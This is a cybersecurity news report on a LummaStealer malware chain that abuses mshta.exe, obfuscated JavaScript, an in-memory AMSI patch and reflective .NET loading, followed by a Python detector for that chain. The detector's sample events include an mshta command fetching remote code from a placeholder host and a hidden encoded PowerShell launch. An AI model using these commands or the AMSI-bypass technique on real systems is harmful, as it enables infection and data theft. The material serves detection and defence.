LummaStealer, a sophisticated information-stealing malware distributed as Malware-as-a-Service (MaaS), has evolved with new evasion techniques that abuse legitimate Windows utilities. Originally observed in 2022 and developed by Russian-speaking adversaries, this malware has demonstrated remarkable agility in evading detection while targeting a wide range of Windows systems.

Cybereason security researchers identified a new and concerning infection vector in which LummaStealer abuses the legitimate mshta.exe Windows utility to execute remotely hosted code that masquerades as an .mp4 multimedia file. This technique, classified as T1218.005 under the MITRE ATT&CK framework, allows attackers to bypass application control solutions and browser security settings, since the execution occurs outside the browser’s security context.

Once users interact with the malicious pages, they are socially engineered into copying and pasting malicious scripts into the Windows Run dialog box, which silently triggers the deployment of the first-stage payload in the background. Rather than video content, the file actually contains a combination of hexadecimal and obfuscated JavaScript code that the mshta.exe process can open and execute. When a user opens this disguised MP4 file, the heavily obfuscated JavaScript code initiates a multi-stage infection process.

The initial JavaScript payload contains a variable named “Fygo” that holds the final version of the second-stage PowerShell payload, which is executed via the JavaScript ‘eval’ function. This function does not distinguish between JavaScript expressions, variables, or statements, allowing it to execute any code passed to it with the caller’s privileges. Further analysis revealed that this decoded content contains PowerShell commands designed to bypass security controls.

When executed, the PowerShell script deploys a third stage that contains an AMSI bypass technique targeting the AmsiScanBuffer function. The code searches for the signature “AmsiScanBuffer” in memory regions associated with clr.dll and overwrites it with null bytes, effectively disabling Microsoft’s Antimalware Scan Interface (AMSI).

The decrypted final payload includes a large Base64-encoded .NET assembly that contains the actual LummaStealer malware. This assembly is loaded directly into memory using reflection techniques, allowing it to operate without writing files to disk, a method that significantly reduces detection rates by avoiding traditional file-based security controls.

According to Cybereason’s research, this variant of LummaStealer is likely distributed through the “Professional” or “Corporate” subscription tiers of the malware service, which offer advanced features such as non-resident loaders and enhanced evasion capabilities.
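Detection logic for the chain described above (mshta.exe fetching remote content with a non-HTA extension, launched from the Run dialog, then spawning PowerShell), written here as an added Python example that is not part of Cybereason’s research or this article. The process-creation events are constructed samples and the example.invalid URL is a placeholder; the explorer.exe-parent rule is a weak signal on its own and is meant to be combined with the others.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields),
# not real telemetry. Events 0 and 1 mirror the chain in the article: the shell
# (Run dialog) launches mshta.exe against a remote ".mp4" URL, which then spawns
# PowerShell. Event 2 is a local HTA; event 3 is benign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/media/clip.mp4"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc QQBCAEMA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\u\AppData\Local\Temp\setup.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Extensions a remote mshta target would legitimately carry; anything else
# (for example .mp4) is a masquerading indicator.
HTA_EXTENSIONS = (".hta", ".htm", ".html")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyse_event(ev):
    """Return the list of rule hits for one event (empty when nothing fires)."""
    reasons = []
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    if image == "mshta.exe":
        match = URL_RE.search(ev["CommandLine"])
        if match:
            reasons.append("T1218.005: mshta.exe executing remotely hosted content")
            url_path = match.group(0).split("?", 1)[0].lower()
            if not url_path.endswith(HTA_EXTENSIONS):
                reasons.append("remote target has a non-HTA extension (masquerading)")
        if parent == "explorer.exe":
            reasons.append("mshta.exe launched from the shell (Run dialog / paste-and-run)")
    elif image in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe":
        reasons.append("PowerShell spawned by mshta.exe (second-stage loader)")
    return reasons

def detect_mshta_abuse(events):
    """Map event index -> rule hits for every event that trips at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := analyse_event(ev))}
```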
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 17 Apr 2025 14:30:07 +0000